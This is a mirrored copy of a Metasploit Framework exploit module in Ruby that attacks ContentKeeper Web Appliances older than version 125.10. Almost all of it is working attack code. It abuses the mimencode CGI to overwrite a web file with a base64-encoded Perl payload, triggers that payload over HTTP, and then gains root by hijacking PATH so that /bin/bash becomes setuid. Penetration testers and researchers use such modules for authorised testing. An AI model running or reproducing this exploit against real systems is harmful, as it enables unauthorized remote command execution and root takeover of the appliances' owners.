Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/http/contentkeeperweb_mimencode.rb
19515 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::Tcp
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'ContentKeeper Web Remote Command Execution',
16
'Description' => %q{
17
This module exploits the ContentKeeper Web Appliance. Versions prior
18
to 125.10 are affected. This module exploits a combination of weaknesses
19
to enable remote command execution as the Apache user. By setting
20
SkipEscalation to false, this module will attempt to setuid the bash shell.
21
},
22
'Author' => [ 'aushack' ],
23
'Arch' => [ ARCH_CMD ],
24
'License' => MSF_LICENSE,
25
'References' => [
26
[ 'OSVDB', '54551' ],
27
[ 'OSVDB', '54552' ],
28
[ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],
29
],
30
'Privileged' => false,
31
'Payload' => {
32
'DisableNops' => true,
33
'Space' => 1024,
34
'Compat' =>
35
{
36
'PayloadType' => 'cmd',
37
'RequiredCmd' => 'generic perl telnet',
38
}
39
},
40
'Platform' => ['unix'],
41
'Targets' => [
42
[ 'Automatic', {} ]
43
],
44
'DisclosureDate' => '2009-02-25',
45
'DefaultTarget' => 0,
46
'Notes' => {
47
'Reliability' => UNKNOWN_RELIABILITY,
48
'Stability' => UNKNOWN_STABILITY,
49
'SideEffects' => UNKNOWN_SIDE_EFFECTS
50
}
51
)
52
)
53
54
register_options(
55
[
56
Opt::RPORT(80),
57
OptString.new('OVERWRITE', [ true, "The target file to upload our payload (spamkeeper.dat, bak.txt, formdate.pl etc)", 'spamkeeper.dat']),
58
OptBool.new("SkipEscalation", [true, "Specify this to skip the root escalation attempt", false]),
59
]
60
)
61
end
62
63
def check
64
connect
65
sock.put("GET /cgi-bin/ck/mimencode HTTP/1.0\r\n\r\n")
66
banner = sock.get_once(-1, 3)
67
disconnect
68
69
if (banner =~ /500 Internal/)
70
return Exploit::CheckCode::Vulnerable
71
end
72
73
return Exploit::CheckCode::Safe
74
end
75
76
def exploit
77
exp = "#!/usr/bin/perl\n"
78
exp << "print \"Content-type: text/html\\n\\n\"\;\n\n"
79
exp << "use IO::Socket::INET;\n"
80
81
if (datastore['PAYLOAD'] =~ /perl/)
82
if not datastore['SkipEscalation']
83
print_status("Attempting to facilitate root escalation...")
84
exp << %q{ system("echo /bin/chmod u+s /bin/bash > ps; /bin/chmod o+x ps; PATH=.:$PATH; ./benetool stopall;"); } # We can use either 'ps' or 'grep' but ps is fine.
85
end
86
exp << payload.encoded.gsub('perl -MIO -e ', '').gsub('\'', '') # We're already inside a perl script!
87
else
88
exp << "system(\""
89
exp << payload.encoded.gsub('"', '\"')
90
exp << "\");\n"
91
end
92
93
body = Rex::Text.encode_base64(exp)
94
95
connect
96
97
sploit = "POST /cgi-bin/ck/mimencode?-u+-o+#{datastore['OVERWRITE']} HTTP/1.1\r\n"
98
sploit << "Host: #{datastore['RHOST']}\r\n"
99
sploit << "Content-Length: #{body.length}\r\n\r\n"
100
101
print_status("Uploading payload to target...")
102
sock.put(sploit + body + "\r\n\r\n")
103
disconnect
104
105
select(nil, nil, nil, 3) # Wait a few seconds..
106
print_status("Calling payload...")
107
connect
108
req = "GET /cgi-bin/ck/#{datastore['OVERWRITE']} HTTP/1.1\r\n" # Almost all files are owned by root, chmod'ed 777 :) rwx
109
req << "Host: #{datastore['RHOST']}\r\n"
110
sock.put(req + "\r\n\r\n")
111
112
handler
113
disconnect
114
select(nil, nil, nil, 3) # Wait for session creation.
115
if not datastore['SkipEscalation'] and session_created? and datastore['PAYLOAD'] =~ /perl/
116
print_status("Privilege escalation appears to have worked!")
117
print_status("/bin/bash is now root setuid! Type 'bash -p' to get root.")
118
print_status("Don't forget to clean up afterwards (chmod -s /bin/bash and restore an original copy of the OVERWRITE file).")
119
end
120
end
121
end
122
123